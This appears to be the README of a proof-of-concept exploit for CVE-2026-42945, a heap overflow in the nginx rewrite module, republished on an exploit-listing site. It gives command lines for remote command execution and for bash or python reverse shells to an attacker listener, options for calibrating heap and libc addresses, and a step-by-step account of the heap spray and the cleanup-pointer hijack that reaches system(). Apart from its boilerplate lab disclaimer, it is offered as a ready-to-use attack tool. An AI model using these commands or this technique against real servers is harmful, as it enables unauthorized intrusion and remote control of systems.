## https://sploitus.com/exploit?id=A6ABFB6C-1C6C-5010-B6BD-1110C1242606
# CVE-2026-42945 (NGINX Rift) RCE PoC with Reverse Shell
Remote code execution proof-of-concept for **CVE-2026-42945**, a heap buffer overflow in NGINX's `ngx_http_rewrite_module`. This fork extends the public trigger PoC with an embedded reverse-shell listener and configurable exploitation parameters for CTF and isolated lab environments.
---
## Vulnerability Summary
- **CVE ID:** CVE-2026-42945
- **Alias:** NGINX Rift
- **Affected Component:** `ngx_http_rewrite_module`
- **Affected Versions:** NGINX Open Source `0.6.27` โ `1.30.0`; NGINX Plus `R32` โ `R36`
- **Fixed Versions:** NGINX Open Source `1.30.1` / `1.31.0`; NGINX Plus `R36 P4`, `R35 P2`, `R32 P6`
- **Root Cause:** Two-pass script engine mismatch. The length-calculation pass runs on a fresh sub-engine with `is_args = 0`, while the copy pass runs on the main engine with `is_args = 1`, invoking `ngx_escape_uri(..., NGX_ESCAPE_ARGS)`. Escapable bytes expand to 3 bytes each, overflowing an undersized heap buffer with attacker-controlled URI data.
- **Prerequisites for RCE:** Vulnerable `rewrite`/`set` configuration using unnamed PCRE captures (`$1`, `$2`) plus `?` in the replacement string; disabled ASLR or known heap/libc base addresses; ability to spray the heap via POST bodies.
---
## Files
| File | Description |
|------|-------------|
| `cve_2026_42945_rce_poc.py` | Python exploit with built-in reverse-shell listener and command execution modes. |
---
## Requirements
- Python 3.8+
- Target NGINX instance matching the vulnerable version and configuration profile.
- Network reachability to the target HTTP port.
- For reverse shell: attacker host must be reachable from the target on the chosen listener port.
---
## Usage
### Execute a single command
```bash
python3 cve_2026_42945_rce_poc.py \
--host 10.0.0.5 \
--port 80 \
--cmd "id > /tmp/pwned"
```
### Spawn a reverse shell (default bash)
```bash
python3 cve_2026_42945_rce_poc.py \
--host 10.0.0.5 \
--port 80 \
--shell \
--listen-ip 10.0.0.1 \
--listen-port 1337
```
### Python reverse shell payload
```bash
python3 cve_2026_42945_rce_poc.py \
--host 10.0.0.5 \
--port 80 \
--shell \
--shell-type python \
--listen-ip 10.0.0.1 \
--listen-port 1337
```
### Calibrate addresses for a specific target
```bash
python3 cve_2026_42945_rce_poc.py \
--host 10.0.0.5 \
--port 80 \
--shell \
--listen-ip 10.0.0.1 \
--listen-port 1337 \
--heap-base 0x555555659000 \
--libc-base 0x7ffff77ba000 \
--system-offset 0x50d70
```
---
## How It Works
1. **Heap Spray:** Send multiple POST requests with bodies containing a fake `ngx_pool_cleanup_s` structure: `system@libc | pointer to command | null`. These bodies occupy stable heap locations.
2. **Trigger Overflow:** Send a crafted GET request to a vulnerable `rewrite` endpoint. The URI pattern is:
```
/api/
```
The overflow corrupts the `cleanup` pointer of an adjacent `ngx_pool_t`.
3. **Code Execution:** When the pool is destroyed, the corrupted `cleanup` pointer invokes `system(command)`, executing the attacker-controlled command inside the NGINX worker process.
4. **Reverse Shell:** If `--shell` is used, the command is a reverse-shell payload and the embedded listener catches the incoming connection.
---
## Security notice
This tool is intended for:
- CTF and lab exercises.
- Authorized penetration testing with written permission.
- Security research and defense-hardening activities.
Do not use on systems you do not own or have explicit permission to test.
---
## License
Use at your own risk. The author is not responsible for unauthorized or illegal use.
---
## Attribution
Original vulnerability research and PoC by **depthfirstdisclosures** (https://github.com/depthfirstdisclosures/nginx-rift).
This Python reverse-shell fork was created for red-team lab / CTF use.
---
## References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-42945
- NGINX Security Advisories: https://nginx.org/en/security_advisories.html
- F5 / NGINX Knowledge Base: https://my.f5.com/manage/s/article/K000161019
- Original research repository: https://github.com/depthfirstdisclosures/nginx-rift